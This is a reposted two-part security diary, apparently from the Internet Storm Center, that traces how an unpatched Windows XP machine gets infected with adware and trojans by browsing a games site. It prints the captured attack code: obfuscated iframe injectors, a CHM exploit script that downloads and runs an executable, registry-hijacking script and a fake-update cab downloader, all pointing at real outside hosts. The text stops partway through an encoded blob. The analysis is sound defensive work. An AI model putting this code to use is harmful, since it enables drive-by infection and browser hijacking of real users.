If you like my site, Please give me a +1


Internet Storm Center Infocon Status

One of the most successful series of the Internet Storm Center


At least read the first 3 paragraphs (then you will know why you need to read the whole thing)

Tom Liston´s Following the Bouncing Malware - Part I:


On July 20th, after investigating some adware/spyware/malarial that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMWare image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry.

Today's diary entry represents the first part of my analysis of what happened when I "forgot to use protection" on the Internet. In part II, I'll examine the full extent of the damage that my poor "Joe Average" would have received, and perhaps add a little "editorializing" to my findings.

To give you a little "preview", I'll say this: I discovered that as far as the adware/spyware industry is concerned, you may be the one that plunked down a grand at your local consumer electronics store to purchase your PC, but THEY own it. They'll do whatever they want, whenever they want, and you don't get a say in the matter. The utter "ballsy-ness" of what they do will astonish you, and I hope reading this might make some of the people enabling this sort of activity to wake up and take action.


Obviously, what happened in my little experiment would be a result of where I decided to go on the net. To be perfectly fair, the sites that will be mentioned in this essay are only a cross-section of the evil that is waiting out there on the net - they're probably no better, or worse than any of the other adware/spyware ilk. My choice of a "starting point" was based on the incident that I had just investigated.

In deciding to be "Joe Average", I tried to replicate (as well as possible) the machine that I had just investigated. That machine had IE6.0 with the Google Toolbar installed with the popup blocker active. Please keep this setup in mind as I "follow the bouncing malware."

Also, something to keep in mind: I'm not going to set up any of the URLs in this tale so that they act as hyperlinks. This is done on purpose. DO NOT FOLLOW THE PATH I'M DESCRIBING HERE, ESPECIALLY IF YOU ARE RUNNING AN UNPATCHED MACHINE. THIS MEANS YOU. REALLY.

After installing the Google Toolbar, I did exactly what my "Joe Average" had done to get his machine compromised: Googled. Someone had told him about "Yahoo Games", and well, he wanted to check it out. I put "Yahoo games" into Google and then clicked on "www.yahoogamez.com" (NOTE: If you're running an unpatched machine, DO NOT GO THERE).

yahoogamez.com is a website that contains links to many different online games, and while I have no idea if their games are any good, their advertisements are certainly interesting. Like many websites which offer online games, the idea here is to get people to visit the site and generate revenue based on advertising that appears on the site and provides an income based on both the number of times an ad is displayed ("impressions") and, especially, on any "click through" traffic. Generally, the site owner contracts with another company that acts as a "go-between", selling "placement" to advertisers, and contracting with sites to display ads. Many of these online advertising companys then provide servers that, on a rotating basis, dole out the code and images for ads to participating websites.

In two instances on the yahoogamez.com site, there are ads provided by "aim4media.com". Going to the yahoogames website results in a flurry of HTTP activity, including the following

[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

Which results in the following HTML:

-----------------------------------------------------------------------------------------------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent'>
<iframe src="http://205.236.189.58/mynet/mynet-MML.html" width=468 height=60 hspace=0 vspace=0
frameborder=0 marginheight=0 marginwidth=0 scrolling=no> <a href="http://205.236.189.58/mynet/mynet-MML.html"
target="_blank"><img width=468 height=60 src="http://205.236.189.58/mynet/mynet-MML.html" border=0></a></iframe>
<div id="beacon_459" style="position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='http://adserver.aim4media.com/adlog.php?bannerid=459&amp;clientid=431&amp;zoneid=450&amp;source=&amp;
block=86400&amp;capping=3&amp;cb=7da741942b0623acd85070683ffa3ad8' width='0' height='0' alt='' style='width: 0px;
height: 0px;'></div>
</body>
</html>

-----------------------------------------------------------------------------------------------------------

This results in the following HTTP GET:
[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
And the following HTML gets downloaded:
<a href="http://www.lovemynet.com/?frombanner2" target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

-----------------------------------------------------------------------------------------------------------

Looks like someone is trying to hide something... This decodes to:
<iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"

Which gives us:
-----------------------------------------------------------------------------------------------------------
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>

-----------------------------------------------------------------------------------------------------------

Which decodes to:
<textarea id="code" style="display:none;">
<object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm"
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
</script>

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"

Within this chm exploit, we find the following hp2.htm file:

-----------------------------------------------------------------------------------------------------------
<script language="vbscript">
Function Exists(filename)
On Error Resume Next
LoadPicture(filename)
Exists = Err.Number = 481
End Function
</script>
<script language="javascript">
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML =
"<object data=http://209.50.251.182/vu083003/object-c002.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
wmplayerpaths= [
"C:\\Programmer\\Windows Media Player\\wmplayer.exe",
"C:\\Program\\Windows Media Player\\wmplayer.exe",
"C:\\Programme\\Windows Media Player\\wmplayer.exe",
"C:\\Programmi\\Windows Media Player\\wmplayer.exe",
"C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
"C:\\Programas\\Windows Media Player\\wmplayer.exe",
"C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
"C:\\Program Files\\Windows Media Player\\wmplayer.exe"
];
for (i=0;i<wmplayerpaths.length;i++) {
wmplayerpath = wmplayerpaths[i];
if (Exists(wmplayerpath))
break;
}
function getPath(url) {
start = url.indexOf('http:')
end = url.indexOf('HP2.CHM')
return url.substring(start, end);
}
payloadURL = getPath(location.href)+'hp2.exe';
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(wmplayerpath,2);
var win=null;
function NewWindow(mypage,myname,w,h,scroll,pos){
if(pos=="random"){
LeftPosition=(screen.width)?Math.floor(Math.random()*(screen.width-w)):100;
TopPosition=(screen.height)?Math.floor(Math.random()*((screen.height-h)-75)):100;
}
if(pos=="center"){
LeftPosition=(screen.width)?(screen.width-w)/2:100;
TopPosition=(screen.height)?(screen.height-h)/2:100;
}
else if((pos!="center" && pos!="random") || pos==null){
LeftPosition=0;TopPosition=20
}
settings='width='+w+',height='+h+',top='
+TopPosition+',left='+LeftPosition
+',scrollbars='+scroll
+',location=no,directories=no,status=no,menubar=no,toolbar=no,resizable=no';
win=window.open(mypage,myname,settings);
}
location.href = "mms://";
</script>


-----------------------------------------------------------------------------------------------------------

Following along...
[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hklm");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
</script>
<script language=javascript>
self.close()
</script>
</html>


-----------------------------------------------------------------------------------------------------------

Well, our home page just got changed, as did our default search engine... Nice, real nice. But that's not all... there was a file called "hp2.exe" that was downloaded and executed by our .chm exploit. Sure enough, looking at my logs, I found:

[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"

hp2.exe is what is known as a "dropper" program. That is, it is actually a small "stub" program with another (sometimes more than one) program attached to it as "data". When the program executes, it writes out the "data" to a file and then executes the resulting program. hp2.exe drops a UPX packed executable that, when executed, will contact www.totalvelocity.com/Bundling/tvmupdater4bp5.exe, which installs/updates the "TV Media Display" spyware.

At this point, I followed one link on the site, that required I have Flash installed. Since I didn't have Flash installed, I went "back". But because I now had cookies placed on my computer from my original visit to the site, one of yahoogamez' files, popup.js, does something differently:

Now, this code within popup.js is executed:

-----------------------------------------------------------------------------------------------------------
if ((document.cookie.indexOf("popuptraffic") != -1 ) && (document.cookie.indexOf("popupsponsor") == -1)){
var expdate = new Date((new Date()).getTime() + 1800000);
document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";
document.write("<script language=\"JavaScript\"
src=\"http://addictivetechnologies.net/dm0/js/Confirmfr03tp.js\"></script>");
}

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
var retry_enabled = true;
var retry_cnt=1;
document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
function retry() {
if(retry_cnt>0) {
alert("To install latest AT- Games update, please click Yes");
start_download();
retry_cnt--;
} else {
//alert("This is a 1 time install, once you click Open it will never pop up this message again");
//downloads_manager.window.location = "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
}
}
function start_download()
{
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
if ( navigator.platform && navigator.platform != 'Win32' ){
//alert("Sorry, your browser is not WIN32 Compatible");
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2){
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab"
HEIGHT=0 WIDTH=0></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
}
else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
//trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
start_download();

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"

This cab file contains two files:

ATPartners.inf - 403 bytes
ATPartnets.dll - 96,256 bytes

The .dll file is identified by AV software as Win32/TrojanDownloader.Rameh.C trojan

And that's were I'm going to end it for today. In the next part, I'll take a look at what happens as this chain of malware continues on it's merry way, and I'll also investigate what happens when I fire up IE the next time and visit my new home page.

-------------------------------------------------------------

 
Tom Liston´s Following the Bouncing Malware -  Part II

Note: The links in this part of the diary are purposely not clickable. DO NOT GO TO THESE SITES. THIS MEANS YOU. REALLY.
Welcome back to Part II of our journey through the seamier side of the internet. To those of you who wrote in asking, I’m sorry it took so long to get this put together and up...
In case you missed Part I, or in case you simply want to review, here's a link to where we started:
http://isc.sans.org/diary.php?date=2004-07-23
Go on... I’ll wait.
Ready? Good.
When we last left our intrepid "Joe Average" computer user, he had just installed Windows XP Home Edition, and gone out on the Internet in search of some fun and adventure. If you recall, someone had told him about Yahoo! Games and he wanted to try them out. Using Google, and ignoring (for whatever reason) several obvious links to Yahoo!, he scrolled down near the bottom of the first Google search page and clicked on a link leading to www.yahoogamez.com.
That's when the fun began.
With an IFRAME here and a CHM exploit there, Joe Average’s shiny new computer was transformed into something new... something Joe never dreamed it would become: an S.E.P.
"Somebody Else’s PC."
Huh?
Well, although Joe still owns (letter "o") the hardware, and gets the privilege of supplying it with electricity and an internet connection, someone else now 0wns (zero) his computer, and they’re making all of Joe's bright and shiny hardware dance to a tune that THEY’RE playing.
You see: All Joe wants his hardware to do is stop all of this nonsense and leave him in peace to play a rousing round of "Donut Boy 2" from the yahoogamez site. But the new happy-go-lucky pals that he's picked up while browsing have some other things in mind...
When I paused our adventure at the end of Part I, the list of "stuff" done to Joe's computer looked like this:
1) Joe's homepage had been changed. It is now set to:
http://default-homepage-network.com/start.cgi?new-hkcu
2) The default search page has been set to:
http://server224.smartbotpro.net/7search/?new-hkcu
3) Search assist has been turned off.
4) "TV Media Display" has been installed on Joe's machine (more on this later.)
5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.
So... what do Joe Average's new found buddies have planned for him next? Let's find out together as we continue to follow the bouncing malware.
Let's start by taking a look inside the file that Addictive Technologies "gave" to Joe. If you’ll recall, it was a .cab file called "fr03tp.cab," containing two files:
ATPartners.inf – 403 bytes
ATPartners.dll – 96,256 bytes
(Some editorializing: The ATPartners.dll contains a statically linked copy of the MSVC runtime. This is completely unnecessary. Addictive Technologies: If you're going to write malware, at least write EFFICIENT malware.)
Looking at the strings contained within the .dll file, we find some interesting stuff:
/F1/Cmd4F1_fr03t.txt
www.f1organizer.com
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
And some downright bizarre stuff:
Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!
(Would anyone care to enlighten me?)
Putting some obvious "stuff" from that list together, we get ourselves a URL:
http://www.f1organizer.com/F1/Cmd4F1_fr03t.txt
where we find the following interesting message:
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF1]
Folder=AT-Games
Link=http://www.gamehouse.com/affiliates/template.jsp?AID=2226
Name=Gamehouse Games

[AddF2]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7551
Name=Big Fish Games

[AddF3]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7834
Name=FlyorDie Games

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/ezbdlLs.dll
InstallName1=bdlds.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm
(Is it just me, or did anyone else find the term "softsell" in the above "RegNow" URLs more than a bit amusing?)
Hey look! More stuff was "updated" on Joe's computer: Let's see... They're adding some stuff to Joe's Internet "Favorites" to advertise purchase links for games that AT gets affiliate bucks for (Gamehouse Games, Big Fish Games, and FlyorDie Games), they've added a link on Joe's Desktop to "007arcadegames," and they're downloading more gifts for Joe: ezbdlLs.dll and SplWbr.dll.
SplWbr.dll weighs in at a whopping 454,656 bytes and is what is known in the AntiVirus biz as a "file dropper." That is, when it is executed, it writes out and installs or executes one or more files that are attached to it as data. In this case, it drops out two files:
Drop#1 – 135,088 bytes which claims to be "Ad Destroyer and Virtual Bouncer Installation" and is digitally signed by Spyware Labs, Inc. (www.spywarelabs.com).
Drop#2 – 302,544 bytes which silently installs "TopRebates.com AutoTrack software" (www.toprebates.com).
ezbdlLs.dll is a 151,040 byte UPX compressed .dll that expands to 176,128 bytes when uncompressed. It too is a file dropper, gracing Joe's machine with three new gifts:
Drop#1 – 65,536 bytes of ASPacked goodness from www.abetterinternet.com which claims to be a "[u]tility for downloading files and upgrading software. Visit www.abetterinternet.com for more info."
Drop#2 – 33,280 bytes of UPX packed fun which expands into 65,536 bytes of crappy software engineering from the fine folks at ezULA (www.ezula.com) who’s stated goal is "Making Your Internet Browsing Simple, Exciting, and Personal." Uh... no thank you.
Drop#3 – 65,024 bytes filled with a NullSoft Installer that gifts Joe's machine with SAHAgent, a Winsock2 Layered Service Provider (LSP) that installs itself in Joe's WinSock stack, much like a personal firewall. SAHAgent redirects select web traffic to cause online purchases made by Joe to be done in a way that will route any affiliate bucks to a specific affiliate ID.
So, what's the upshot of this whole mess? Well, Joe has had five new software packages installed onto his machine, redirecting his browsing, his searching, and his online purchases to suit the desires of the (no-doubt ;-) fine, upstanding people at ATPartners. His Internet browsing will now be "Simple, Exciting, and Personal" (ezula), he’ll always know that "The Best Downloads are Free" (abetterinternet), his computer will show him the "Smart way to put money in your pocket" (TopRebates) and he needn’t worry about adware/spyware any more because Virtual Bouncer has been installed to... uh... bounce it (Spyware Labs). Oh, and his online purchases will earn money for... uh... um.... someone. (SAHAgent). Joe should be so very, very happy.
But did you happen to notice THIS section in the text-file o' instructions that the ATPartners.dll downloaded?
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt
Next time around, we’re going to download a DIFFERENT set of "configuration" instructions:
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_nCase321.htm

Server2=www.f1organizer.com
Object2=/F1/objects/ezbdlLs.dll
InstallName2=bdlds.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server3=www.f1organizer.com
Object3=/F1/objects/W2020Setup.dll
InstallName3=W2020Setup.dll
RepURL3=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server4=www.f1organizer.com
Object4=/F1/objects/MyDailyHoroscope.dll
InstallName4=MyDailyHoroscope.dll
RepURL4=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_eZula.htm

Server-6=www.f1organizer.com
Object-6=/F1/objects/MoreResultsSetup.dll
InstallName-6=MoreResultsSetup.dll
RepURL-6=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-3=www.f1organizer.com
Object-3=/F1/objects/KVIF_11.dll
InstallName-3=KVIF_11.dll
RepURL-3=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_KVI.htm
Just looking at that list makes me tired. (And the name "ezStD" makes me laugh… For those non-English speakers out there, STD is an acronym for "Sexually Transmitted Disease" :-) I could slog down through the whole sorry mess, and perhaps I will if there is enough interest, but for now let's take a look at another area where Joe is no longer the 0wner of his P.C.: his homepage.
Joe's homepage was changed in the initial "drive-by" to be "http://default-homepage-network.com/start.cgi?new-hkcu". The next time that Joe fires up IE, here’s what he gets (suitably edited to remove superfluous crud):
<html><head>
<title>Default Homepage Network</title>
</head>
<body>
[script language=javascript]
<!--
var agt=navigator.userAgent.toLowerCase();
var is_ie = (agt.indexOf("msie") != -1);
var is_aol = (agt.indexOf("aol") != -1);

if (!is_aol) {
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight);
}
location.href="http://default-homepage-network.com/newspynotice.html"
if (!is_aol) {
var expdate = new Date((new Date()).getTime() + 600000);
if (document.cookie.indexOf("delayed") == -1) {
document.cookie=
"delayed=general; expires=" + expdate.toGMTString() + "; path=/;";
splashWin2 = window.open("",'y','fullscreen=1,toolbar=0,location=0,\
directories=0,status=0,menubar=0,scrollbars=0,resizable=0');
splashWin2.blur();
window.focus();
splashWin2.resizeTo(10,10);
splashWin2.moveTo(5000,5000);
splashWin2.location="http://object.passthison.com/aff/delayed/";
window.focus();
}
}
//-->
[/script]</body>
The referenced file, "newspynotice.html," is another rather interesting little gem. It displays a big red stop sign, and explains that poor Joe’s computer may be infected with spyware. Has Joe noticed that his home page has been changed? (Well, duh!) Has his computer been acting "wierd" lately? (Why can’t these malware clowns spell?) Is the Internet "running slow or crashing?" If so, Joe simply needs to click on a link on the page and his "computer will be back to normal and secure again in just a few minutes." Oh, joy... oh, joy. But, hidden within the HTML of this “IMPORTANT SECURITY NOTICE!” page is a little surprise:
<!-- 1. newobj1 -->

[script type="text/javascript"]document.write('\u003c\u0073\u0063\u0072\u0069\u0070
\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a
\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a
\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070\u0020\u003d
\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061
\u0074\u0065\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u003b\u000d\u000a
\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0068\u006f
\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b\u000d
\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0064\u006f\u0063
\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0069
\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022
\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061
\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006f\u0062\u006a\u0065
\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068\u0069\u0073\u006f
\u006e\u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030
\u0030\u0033\u002f\u006e\u0065\u0077\u006f\u0062\u006a\u0065\u0063\u0074
\u0031\u002e\u0063\u0067\u0069\u003e\u0022\u003b\u000d\u000a\u0009\u006f
\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028\u0030
\u002c\u0030\u002c\u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d
\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u0029\u003b\u000d\u000a
\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070
\u0028\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070
\u0074\u003e')[/script]

<!-- 2. e1 -->

[script type="text/javascript"]document.write('\u003c\u0069\u0066\u0072\u0061\u006d
\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a
\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e\u0031\u0033\u0039\u002e
\u0036\u0031\u002f\u0068\u0070\u0031\u002f\u0068\u0070\u0031\u002e\u0068
\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f\u0069
\u0066\u0072\u0061\u006d\u0065\u003e')[/script]
A little decoding gives us Part 1:
[script language=javascript]
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object\
data=http://object.passthison.com/vu083003/newobject1.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup();
[/script]
And Part 2:
[iframe src="http://69.50.139.61/hp1/hp1.htm" width=1 height=1][/iframe]
This recalls the hp2.htm file that was downloaded and installed in Part I of this epic adventure. Same site, same method, same result:
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

[script type="text/javascript"]document.write('\u003c\u0074\u0065\u0078\u0074\u0061
\u0072\u0065\u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065
\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073
\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022\u003e
\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a\u0065\u0063
\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031\u0030
\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c
\u0066\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041
\u0054\u0048\u007d\u002f\u0048\u0050\u0031\u002e\u0043\u0048\u004d\u003a
\u003a\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0074
\u0079\u0070\u0065\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d
\u0073\u0063\u0072\u0069\u0070\u0074\u006c\u0065\u0074\u0022\u003e\u003c
\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u000d\u000a\u003c\u002f
\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d
\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e
\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073
\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020\u0020\u0020
\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072
\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f
